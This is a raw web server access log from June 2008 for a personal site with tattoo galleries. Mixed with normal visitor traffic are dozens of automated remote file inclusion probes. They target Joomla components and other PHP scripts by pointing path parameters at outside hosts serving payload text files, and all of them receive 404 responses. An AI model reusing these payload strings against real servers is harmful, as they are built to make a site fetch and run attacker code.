219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:40 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:41 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:39:41 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
193.242.119.110 - - [22/Jun/2008:01:40:26 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.64"
193.242.119.110 - - [22/Jun/2008:01:40:26 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.64"
219.101.201.34 - - [22/Jun/2008:01:40:57 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:40:58 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
195.161.113.132 - - [22/Jun/2008:01:41:40 -0500] "GET /logs//vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
195.161.113.132 - - [22/Jun/2008:01:41:40 -0500] "GET //vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
66.7.200.210 - - [22/Jun/2008:01:41:43 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
66.7.200.210 - - [22/Jun/2008:01:41:43 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
83.137.192.222 - - [22/Jun/2008:01:41:59 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
83.137.192.222 - - [22/Jun/2008:01:42:00 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
210.48.67.39 - - [22/Jun/2008:01:45:08 -0500] "GET /logs/errors.php?error=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.48.67.39 - - [22/Jun/2008:01:45:08 -0500] "GET /errors.php?error=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.242.98.48 - - [22/Jun/2008:01:47:26 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.242.98.48 - - [22/Jun/2008:01:47:27 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
89.149.241.207 - - [22/Jun/2008:01:48:54 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:01:48:54 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
85.25.142.64 - - [22/Jun/2008:01:50:06 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:50:07 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:50:11 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:50:11 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.186.62.37 - - [22/Jun/2008:01:52:05 -0500] "GET /logs//tools/errors.php?error=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
213.186.62.37 - - [22/Jun/2008:01:52:05 -0500] "GET //tools/errors.php?error=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
67.205.74.80 - - [22/Jun/2008:01:53:56 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
67.205.74.80 - - [22/Jun/2008:01:53:56 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
67.205.74.80 - - [22/Jun/2008:01:54:03 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
67.205.74.80 - - [22/Jun/2008:01:54:03 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
207.36.232.125 - - [22/Jun/2008:01:54:42 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
207.36.232.125 - - [22/Jun/2008:01:54:43 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
85.25.142.64 - - [22/Jun/2008:01:55:17 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:55:18 -0500] "GET //index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:55:20 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.25.142.64 - - [22/Jun/2008:01:55:21 -0500] "GET //index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.3.2.99 - - [22/Jun/2008:01:55:43 -0500] "GET //index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.3.2.99 - - [22/Jun/2008:01:55:44 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
66.7.208.173 - - [22/Jun/2008:01:55:46 -0500] "GET //index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.7.208.173 - - [22/Jun/2008:01:55:47 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.84.143.195 - - [22/Jun/2008:01:56:29 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.84.143.195 - - [22/Jun/2008:01:56:29 -0500] "GET //index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:56:39 -0500] "GET /logs/*include/write.php?dir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:56:39 -0500] "GET /*include/write.php?dir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
99.1.110.136 - - [22/Jun/2008:01:57:35 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://answers.yahoo.com/question/index?qid=20070729234637AARHCDH""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:35 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:36 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.86.92.124 - - [22/Jun/2008:01:57:38 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
80.86.92.124 - - [22/Jun/2008:01:57:38 -0500] "GET //index.php?mosConfig_absolute_path=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
99.1.110.136 - - [22/Jun/2008:01:57:43 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:43 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:43 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
99.1.110.136 - - [22/Jun/2008:01:57:44 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.1.04b)"
203.57.68.22 - - [22/Jun/2008:01:57:54 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.57.68.22 - - [22/Jun/2008:01:57:54 -0500] "GET //index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.196.13.90 - - [22/Jun/2008:01:58:11 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.57.68.22 - - [22/Jun/2008:01:58:13 -0500] "GET /logs//index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.57.68.22 - - [22/Jun/2008:01:58:14 -0500] "GET //index.php?mosConfig_absolute_path=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.196.13.90 - - [22/Jun/2008:01:58:17 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.52.139.226 - - [22/Jun/2008:01:58:31 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
74.52.139.226 - - [22/Jun/2008:01:58:31 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
89.149.241.207 - - [22/Jun/2008:01:59:15 -0500] "GET /logs//spaw_control.class.php?spaw_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:01:59:16 -0500] "GET //spaw_control.class.php?spaw_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
87.242.98.48 - - [22/Jun/2008:01:59:39 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.242.98.48 - - [22/Jun/2008:01:59:39 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
72.29.92.223 - - [22/Jun/2008:02:00:20 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
72.29.92.223 - - [22/Jun/2008:02:00:20 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
213.186.62.37 - - [22/Jun/2008:02:01:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
213.186.62.37 - - [22/Jun/2008:02:01:06 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.210.113.58 - - [22/Jun/2008:02:01:47 -0500] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
62.210.113.58 - - [22/Jun/2008:02:01:47 -0500] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
74.53.178.146 - - [22/Jun/2008:02:02:36 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.53.178.146 - - [22/Jun/2008:02:02:36 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:09:51 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:09:53 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:09:53 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:09:54 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
89.149.241.207 - - [22/Jun/2008:02:10:34 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:02:10:34 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
85.25.26.55 - - [22/Jun/2008:02:10:41 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
85.25.26.55 - - [22/Jun/2008:02:10:41 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.112.193.46 - - [22/Jun/2008:02:12:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
62.112.193.46 - - [22/Jun/2008:02:12:27 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
74.6.17.158 - - [22/Jun/2008:02:13:12 -0500] "GET /artwork/toys.htm HTTP/1.0" 200 1337 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.126.108.198 - - [22/Jun/2008:02:14:18 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:14:18 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:14:22 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:14:23 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://truehiphop.name/sam//common/scan.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
62.112.193.46 - - [22/Jun/2008:02:16:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.112.193.46 - - [22/Jun/2008:02:16:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.18.204.110 - - [22/Jun/2008:02:17:00 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.65"
66.18.204.110 - - [22/Jun/2008:02:17:12 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.65"
72.9.228.149 - - [22/Jun/2008:02:17:26 -0500] "GET /logs//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:02:17:26 -0500] "GET //postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
200.62.54.120 - - [22/Jun/2008:02:18:20 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
200.62.54.120 - - [22/Jun/2008:02:18:21 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
200.62.54.120 - - [22/Jun/2008:02:18:21 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:02:20:09 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:02:20:09 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
88.208.231.141 - - [22/Jun/2008:02:21:28 -0500] "GET /logs/mcf.php?content=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
88.208.231.141 - - [22/Jun/2008:02:21:28 -0500] "GET /mcf.php?content=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
89.149.241.207 - - [22/Jun/2008:02:25:52 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:02:25:54 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:02:26:46 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:02:26:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
65.98.70.18 - - [22/Jun/2008:02:29:11 -0500] "GET /logs//tools/errors.php?error=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
65.98.70.18 - - [22/Jun/2008:02:29:11 -0500] "GET //tools/errors.php?error=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.9.228.149 - - [22/Jun/2008:02:30:48 -0500] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:02:30:48 -0500] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
